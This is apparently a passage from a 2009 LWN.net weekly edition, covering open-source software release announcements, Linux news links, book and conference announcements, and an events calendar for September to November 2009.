TimingAnalyzer 0.932 beta released
Version 0.932 beta of TimingAnalyzer is available with a bug fix. "The TimingAnalyzer can be used to easily draw timing diagrams and perform timing analysis to find faults in digital systems. The diagrams can be saved in many different image file formats and scalable vector formats so they can easily be added to documentation. With Python scripts, the user can draw large complex timing diagrams quickly, generate test vectors and testbenches for analog and digital simulations, and add new features to the program. Written in Java, it runs on any platform that supports the Java Run-time Environment (JRE1.6.0) or Java Development Kit JDK1.6.0 or newer."
Encryption Software
M2Crypto 0.20.1 released
Version 0.20.1 of M2Crypto has been announced, it includes a bug fix. "M2Crypto is the most complete Python wrapper for OpenSSL featuring RSA, DSA, DH, HMACs, message digests, symmetric ciphers (including AES); SSL functionality to implement clients and servers; HTTPS extensions to Python's httplib, urllib, and xmlrpclib; unforgeable HMAC'ing AuthCookies for web session management; FTP/TLS client and server; S/MIME; ZServerSSL: A HTTPS server for Zope and ZSmime: An S/MIME messenger for Zope. Smartcards supported with the Engine interface."
Financial Applications
Gnucash 2.3.5 released
Version 2.3.5 of Gnucash has been announced. "The GnuCash development team proudly announces GnuCash 2.3.5, the sixth of several unstable 2.3.x releases of the GnuCash Free Accounting Software which will eventually lead to the stable version 2.4.0. With this new release series, GnuCash can use an SQL database using SQLite3, MySQL or PostgreSQL. It runs on GNU/Linux, *BSD, Solaris, Microsoft Windows and Mac OSX. This release is intended for developers and testers who want to help tracking down all those bugs that are still in there."
Music Applications
Ardour MIDI editing sneak preview
A sneak preview of the upcoming Ardour MIDI editing capability has been announced. "Ardour 3 is still not ready for testing by non-developing users, but I wanted to provide a preview of the way the "inline" MIDI editing system is taking shape, and to provide a record of key- and mouse-bindings for future manual writers."
aseqmm 0.1.0 released
Version 0.1.0 of aseqmm has been announced. "aseqmm is a C++ wrapper around the ALSA library sequencer interface using Qt4 objects, idioms and style. ALSA sequencer provides software support for MIDI technology on Linux. This is the first public release of aseqmm."
Office Suites
OpenOffice.org 3.1.1 is available
Version 3.1.1 of OpenOffice.org has been announced. "Full details of the bugs fixed may be found in the release notes. Details of the security vulnerabilities fixed will be published in our security bulletin on September 11th when the standard public disclosure embargo expires. To our knowledge, none of these vulnerabilities has been exploited; however, in accordance with industry best practice, we recommend all users of earlier versions to upgrade to 3.1.1."
Miscellaneous
BleachBit 0.6.3 released
Version 0.6.3 of BleachBit has been announced. "BleachBit trace files to maintain your privacy and deletes junk to recover disk space. Notable changes for 0.6.1: * Clear unused inode data on ext3 and ext4 (and try on other file systems) to hide the metadata (filename, file size, date) of previously deleted files * Delete Windows system logs * Update 18 translations".
IMDbPY 4.2 released
Version 4.2 of IMDbPY has been announced. "IMDbPY is a Python package useful to retrieve and manage the data of the IMDb movie database about movies, people, characters and companies. With this release, a lot of bugs were fixed, and some minor new features introduced."
Languages and Tools
C
GCC 4.4.2 Status Report
The September 1, 2009 edition of the GCC 4.4.2 Status Report has been published. "The 4.4 branch is open for commits under the usual release branch rules. The timing of the 4.4.2 release (at least two months after the 4.4.1 release, so no sooner than September 22) at a point when there are no P1 regressions open for the branch) has yet to be determined."
LLVM 2.6 pre-1 released
Version 2.6 pre-1 of LLVM, the Low Level Virtual Machine Compiler Infrastructure, has been announced. "2.6 pre-release1 is ready to be tested by the community. You will notice that we have quite a few pre-compiled binaries (of both clang and llvm-gcc). We have identified several bugs that will be fixed in pre-release2, so please search the bug database before filing a new bug. If you have time, I'd appreciate anyone who can help test the release."
Caml
Caml Weekly News
The September 1, 2009 edition of the Caml Weekly News is out with new articles about the Caml language.
Python
cssutils 0.9.6b5 released
Version 0.9.6b5 of cssutils has been announced, it is a bug fix release. "what is it? A Python package to parse and build CSS Cascading Style Sheets. (Not a renderer though!)"
Jython 2.5.1 release candidate 1 is out
Release candidate 1 of Jython 2.5.1, an implementation of Python in Java, has been released. "Jython 2.5.1rc1 fixes a number of bugs, including some major errors when using coroutines and when using relative imports."
pylib/py.test 1.0.2 released
Version 1.0.2 of pylib/py.test has been announced. "i just pushed a pylib/py.test 1.0.2 maintenance release, fixing several issues triggered by fedora packaging. Also added a link to the new pytest_django plugin, a changelog and some other improvements."
pylint 0.18.1 / astng 0.19.1 released
Version 0.18.1 of pylint and version 0.19.1 of astng have been announced, both include bug fixes. Pylint: "analyzes Python source code looking for bugs and signs of poor quality."
PyYAML 3.09 released
Version 3.09 of PyYAML, a YAML parser and emitter for Python, has been announced, it includes a number of bug fixes.Python-URL! - weekly Python news and links
The September 2, 2009 edition of the Python-URL! is online with a new collection of Python article links.
Tcl/Tk
Tcl-URL! - weekly Tcl news and links
The August 27, 2009 edition of the Tcl-URL! is online with new Tcl/Tk articles and resources.
Version Control
GIT 1.6.4.2 released
Version 1.6.4.2 of the GIT distributed version control system has been announced, it includes several bug fixes and documentation updates.vadm 0.6.0 released
Version 0.6.0 of vadm has been announced. "i just uploaded vadm-0.6.0 to PyPI: a svn-like command line tool for non-intrusively versioning posix files and ownership information."
Page editor: Forrest Cook
Linux in the news
Trade Shows and Conferences
Fake Linus Torvalds Set For Web Vitriol Barrage (ChannelWeb)
ChannelWeb covers the Linux Foundation's Fake Linus Torvalds contest. "You've probably heard of Fake Steve Jobs. Now get ready for Fake Linus Torvalds. The Linux Foundation is running a contest in which four different Fake Linus Torvalds will post Twitter messages from the Identi.ca and Twitter feeds, all in an attempt to portray themselves as the most compelling facsimile to the father of Linux. In a blog post earlier this week, Jim Zemlin, executive director at The Linux Foundation, said he expects that some of the posts from the Fake Torvalds will be "dangerously outrageous," while others will be "downright funny.""
The SCO Problem
The Hon. Ted Stewart and the Hon. Tena Campbell (Groklaw)
Groklaw introduces the Honorable Ted Stewart and the Honorable Tena Campbell. "The Hon. Tena Campbell is the Chief Judge, and she is assigned to SCO v. IBM. Her bio is here. She was appointed by President Bill Clinton, as was Judge Stewart, the judge assigned now to the SCO v. Novell case. That doesn't mean they were his picks, just that they were appointed during his presidency." Ted Stewart has been assigned to the SCO v. Novell case.
Business
Windows Loses Money, Linux Nears the $1 Billion Mark (Softpedia)
Softpedia contrasts the growth of Linux to the loss of revenue for Microsoft. "In a time when Microsoft is feeling the full impact of the global economic downturn, the open-source Linux operating system is flourishing. While Windows client revenue has let the Redmond company suffering in the 2009 fiscal year, producing three quarters inferior when compared to FY2008, Linux revenue continues to grow and is right on track of making the open-source OS a $1 billion a year business. Market analysis firm IDC estimates that between 2008 and 2013 Linux revenue will deliver a compound annual growth rate (CAGR) of no less than 16.9%."
Linux at Work
Man Uses Linux and CD Tray to Rock Baby to Sleep (Switched)
Linux has many novel uses, including infant care. "Parents of newborns sometimes devise ingenious MacGyver-esque devices to keep their babies entertained, or to, more importantly, soothe them to sleep. One inventive techie, who goes by the YouTube handle macjonesnz, has created a ridiculously inexpensive self-rocking chair using only his computer and a piece of string."
Legal
Public Citizen: Official Word from US Courts -- Feel Free to Use RECAP With Our Blessing
Public Citizen has updated their earlier posting about RECAP, which we linked to earlier in the week. RECAP is a Firefox extension to assist in sharing court documents from PACER and it appeared that the US federal court system was scare-mongering about "open source" in a warning it sent out. "To the extent that messages from some districts sounded more severe, it was simply a matter of reminding all of our ECF filers to be careful about computer security and was not intended to discourage use of RECAP."
Reviews
Iomega intros four-bay NAS (Macworld)
Macworld reviews the Iomega StorCenter ix4-200d Network Attached Storage device. "It comes in 2, 4 and 8 terabyte configurations for $700, $900 and $1,900 respectively. The StorCenter x4-200d features four hot-swappable SATA II drive bays which come configured as a RAID 5 array, but can also be configured as a RAID 10 (with automatic RAID rebuild) or as a JBOD (Just a Bunch Of Disks) configuration. Inside, the system is running an embedded Linux operating system equipped with EMC LifeLine software."
Miscellaneous
Microsoft contract forces cancellation of Stallman talk in Argentina (Matware)
The "Matware" site has a brief article (in Spanish) stating that a planned talk by Richard Stallman at the Argentinian National Technological University, Mar del Plata, has been canceled as the result of contracts signed with Microsoft. Said contracts, it is said, prohibit the university from criticizing the company or its products. English translation is available via Google.
Page editor: Forrest Cook
Announcements
Commercial announcements
Gil: Here comes Maemo 5
Quim Gil's Maemo 5 hype posting (associated with the N900 phone launch) has some encouraging text: "If freedom is your concern then you dont need to 'unlock' or 'jailbreak' Maemo 5. From installing an application to getting root access, its you who decide. We trust you, and at the end its your device. Nokia also trusts the open source community in general and the Maemo community particularly helping in getting casual users through the experience path. The N900 might just be a new and successful entry point for a new wave of open source users and developers."
Tucows: Copyright's creative disincentive
Worth a read: this submission from Tucows to the Canadian copyright consultation process. "The nice thing about that argument is that it makes a factual claim: Weaken copyright and you decrease innovation. That the facts so resoundingly, enthusiastically, thumpingly dispute that conclusion tells us that the syllogism is wrong. Indeed, the facts say the syllogism has it backwards. Current copyright laws are holding back the innovation they were intended to spur."
New Books
Netbooks: The Missing Manual--New from O'Reilly
O'Reilly has published the book Netbooks: The Missing Manual by J.D. Biersdorfer.
Should you wish to purchase this book, you can get it from Amazon.com and help LWN earn a little money.
Book Excerpt: The Official Ubuntu Book (Linux Journal)
Linux Journal has published a new book excerpt. "Read an adapted version of chapter 3 from the book The Official Ubuntu Book By Benjamin Mako Hill, Matthew Helmke, Corey Burger. This article is an adapted excerpt of Chp 3 from the "The Official Ubuntu Book"".
Should you wish to purchase this book, you can get it from Amazon.com and help LWN earn a little money.
web2py book 2nd Edition is available
The second edition of the web2py book has been announced. "Lots of new stuff with100 more pages (341 pages in total). Covers Auth, Crud, Services, interaction with Pyjamas, PyAMF, and better deployment recipes."
Resources
Linux Gazette #166 is out
The September, 2009 edition of the Linux Gazette has been published. Topics include: "* Mailbag * Talkback * 2-Cent Tips * News Bytes, by Deividson Luiz Okopnik and Howard Dyckoff * Away Mission: VMware World, Digital ID World and Intel Developer Forum, by Howard Dyckoff * Linux Layer 8 Security, by Lisa Kachold Taking off the Blinders, or Looking for Proof after Suspicion * Using Linux to Teach Kids How to Program, 10 Years Later (Part I), by Anderson Silva * Internet Radio Router, by Dr. Volker Ziemann * XKCD, by Randall Munroe * Doomed to Obscurity, by Pete Trbovich * The Back Page, by Kat Tanaka Okopnik".
Education and Certification
Linux Professional Institute hosts exam labs at Ohio LinuxFest 2009
The Linux Professional Institute will host exam labs at the Ohio LinuxFest 2009 on September 27. "This is the fourth year that LPI has been certification sponsor for Ohio LinuxFest and the event this year will be celebrating the 40th Anniversary of the Unix operating system."
Calls for Presentations
O'Reilly Where 2.0 Conference cfp
A call for papers has gone out for the 2010 O'Reilly Where 2.0 Conference. "The O'Reilly Where 2.0 Conference will redefine the boundaries of location-enabled technology March 30-April 1, 2010, at the Marriott San Jose, in San Jose, California. Program chair Brady Forrest and O'Reilly Media invite the builders and innovators in the geospatial industry to submit proposals for sessions and workshops at the sixth Where 2.0." Proposals are due by October 13.
Upcoming Events
Mini-DebConf Taiwan 2009
The Mini-DebConf Taiwan 2009 has been announced. "The "Software Liberty Association of Taiwan"(SLAT) is featuring a mini-DebConf during ICOS 2009 - International Conference on Open Source in Taipei in September, 2009. It's the 1st mini-DebConf in Taiwan, and would possibly become the 2nd Asia mini-DebConf (if DDs from China/Japan/Korea/Hong Kong can be join as well) since the 1st was on 2005 in Beijing. Please join us in Taipei on Saturday 26th and Sunday 27th of September, 2009."
Apache Foundation's Gianugo Rabellino to Keynote openSUSE Conference
The opening and closing keynotes for the openSUSE Conference have been announced. "The openSUSE Conference is an opportunity for openSUSE contributors to attend talks, workshops, Birds of a Feather sessions, and collaborate together face to face. The conference will be held from September 17 through September 20 in Nürnberg, Germany."
Red Hat/Fedora/JBoss Developer conference in Brno, Czech Republic
The next Red Hat/Fedora/JBoss Developer conference has been announced. "If you don't have any plans for September 10th and 11th, plan a trip to Czech Republic! Red Hat Brno office is organizing an open conference at Masaryk University in Brno, CZ".
Events: September 10, 2009 to November 9, 2009
The following event listing is taken from the LWN.net Calendar.
| Date(s) | Event | Location |
|---|---|---|
| September 7 September 11 |
XtreemOS summer school | Oxford, UK |
| September 8 September 12 |
DjangoCon '09 | Portland, OR, USA |
| September 10 September 11 |
Fedora Developer Conference 2009 | Brno, Czech Republic |
| September 12 | Evil Robot Conference (Free Conference, Free Software) | Raleigh, NC, USA |
| September 14 September 18 |
Django Bootcamp at the Big Nerd Ranch | Atlanta, Georgia, USA |
| September 15 September 17 |
International Conference on IT Security Incident Management and IT Forensics | Stuttgart, Germany |
| September 17 September 18 |
Internet Security Operations and Intelligence 7 | San Diego, CA, USA |
| September 17 September 20 |
openSUSE Conference | Nuremberg, Germany |
| September 18 September 19 |
BruCON | Brussels, Belgium |
| September 18 September 20 |
EuroBSDCon 2009 | Cambridge, UK |
| September 19 | Atlanta Linux Fest 2009 | Atlanta, Georgia, USA |
| September 19 | Beijing Perl Workshop | Beijing, China |
| September 19 | Software Freedom Day | Worldwide |
| September 20 | SELinux Developer Summit 2009 @ LinuxCon | Portland, Oregon, USA |
| September 21 September 23 |
LinuxCon 2009 | Portland, OR, USA |
| September 21 September 25 |
Ruby on Rails Bootcamp with Charles B. Quinn | Atlanta, USA |
| September 23 September 25 |
Linux Plumbers Conference | Portland, Oregon, USA |
| September 23 September 25 |
Recent Advances in Intrusion Detection | Saint-Malo, Brittany, France |
| September 23 September 25 |
OpenSolaris Developer Conference 2009 | Hamburg, Germany |
| September 23 | Bacula Conference 2009 | Cologne, Germany |
| September 24 September 26 |
Joomla! and Virtue Mart Day Germany | Bad Nauheim, Germany |
| September 25 September 27 |
International Conference on Open Source | Taipei, Taiwan |
| September 25 September 27 |
Ohio LinuxFest | Columbus, Ohio, USA |
| September 26 September 27 |
PyCon India 2009 | Bengaluru, India |
| September 26 | Open Source Conference 2009 Okinawa | Ginowan City, Okinawa, Japan |
| September 26 September 27 |
Mini-DebConf at ICOS | Taipei, Taiwan |
| September 28 September 30 |
Real time Linux workshop | Dresden, Germany |
| September 28 September 30 |
X Developers' Conference 2009 | Portland, OR, USA |
| September 28 October 2 |
Sixteenth Annual Tcl/Tk Conference (2009) | Portland, OR 97232, USA |
| September 30 | HCC!Linux Theme Day | Houten, Netherlands |
| October 1 October 2 |
Open World Forum | Paris, France |
| October 2 October 4 |
7th International Conference on Scalable Vector Graphics | Mountain View, CA, USA |
| October 2 | LLVM Developers' Meeting | Cupertino, CA, USA |
| October 2 October 4 |
Linux Autumn (Jesien Linuksowa) 2009 | Huta Szklana, Poland |
| October 2 October 4 |
Ubuntu Global Jam | Online, Online |
| October 2 October 3 |
Open Source Developers Conference France | Paris, France |
| October 2 | Mozilla Public DevDay/Open Web Camp 2009 | Prague, Czech Republic |
| October 3 October 4 |
T-DOSE 2009 | Eindhoven, The Netherlands |
| October 3 October 4 |
EU MozCamp 2009 | Prague, Czech Republic |
| October 7 October 9 |
Jornadas Regionales de Software Libre | Santiago, Chile |
| October 8 October 10 |
Utah Open Source Conference | Salt Lake City, Utah, USA |
| October 9 October 11 |
Maemo Summit 2009 | Amsterdam, The Netherlands |
| October 10 October 12 |
Gnome Boston Summit | Cambridge, MA, USA |
| October 10 | OSDN Conference 2009 | Kiev, Ukraine |
| October 12 October 14 |
Qt Developer Days | Munich, Germany |
| October 15 October 16 |
Embedded Linux Conference Europe 2009 | Grenoble, France |
| October 16 October 17 |
Pycon Poland 2009 | Ustron, Poland |
| October 16 October 18 |
Pg Conference West 09 | Seattle, WA, USA |
| October 16 October 18 |
German Ubuntu conference | Göttingen, Germany |
| October 18 October 20 |
2009 Kernel Summit | Tokyo, Japan |
| October 19 October 22 |
ZendCon 2009 | San Jose, CA, USA |
| October 21 October 23 |
Japan Linux Symposium | Tokyo, Japan |
| October 22 October 24 |
Décimo Encuentro Linux 2009 | Valparaiso, Chile |
| October 23 October 24 |
Ontario GNU Linux Fest | Toronto, Ontario, Canada |
| October 23 October 24 |
PGCon Brazil 2009 | Sao Paulo, Brazil |
| October 24 October 25 |
PyTexas | Fort Worth, TX, USA |
| October 24 October 25 |
FOSS.my 2009 | Kuala Lumpur, Malaysia |
| October 24 | Florida Linux Show 2009 | Orlando, Florida, USA |
| October 24 | LUG Radio Live | Wolverhampton, UK |
| October 25 | Linux Outlaws and Ubuntu UK Podcast OggCamp | Wolverhampton, UK |
| October 26 October 28 |
Techno Forensics and Digital Investigations Conference | Gaithersburg, MD, USA |
| October 26 October 28 |
GitTogether '09 | Mountain View, CA, USA |
| October 26 October 28 |
Pacific Northwest Software Quality Conference | Portland, OR, USA |
| October 27 October 30 |
Linux-Kongress 2009 | Dresden, Germany |
| October 28 October 30 |
Hack.lu 2009 | Luxembourg |
| October 28 October 30 |
no:sql(east). | Atlanta, USA |
| October 29 | NLUUG autumn conference: The Open Web | Ede, The Netherlands |
| October 30 November 1 |
YAPC::Brasil 2009 | Rio de Janeiro, Brazil |
| October 31 | Linux theme day with ubuntu install party | Ede, Netherlands |
| November 1 November 6 |
23rd Large Installation System Administration Conference | Baltimore, MD, USA |
| November 2 November 6 |
ApacheCon 2009 | Oakland, CA, USA |
| November 2 November 6 |
Ubuntu Open Week | Internet, Internet |
| November 3 November 6 |
OpenOffice.org Conference | Orvieto, Italy |
| November 4 November 5 |
Linux World NL | Utrecht, The Netherlands |
| November 5 | Government Open Source Conference | Washington, DC, USA |
| November 6 November 8 |
WineConf 2009 | Enschede, Netherlands |
| November 6 November 10 |
CHASE 2009 | Lahore, Pakistan |
| November 6 November 7 |
PGDay.EU 2009 | Paris, France |
| November 7 November 8 |
OpenFest 2009 - Biggest FOSS conference in Bulgaria | Sofia, Bulgaria |
| November 7 November 8 |
OpenRheinRuhr | Bottrop, Germany |
| November 7 November 8 |
Kiwi PyCon 2009 | Christchurch, New Zealand |
If your event does not appear here, please tell us about it.
Page editor: Forrest Cook
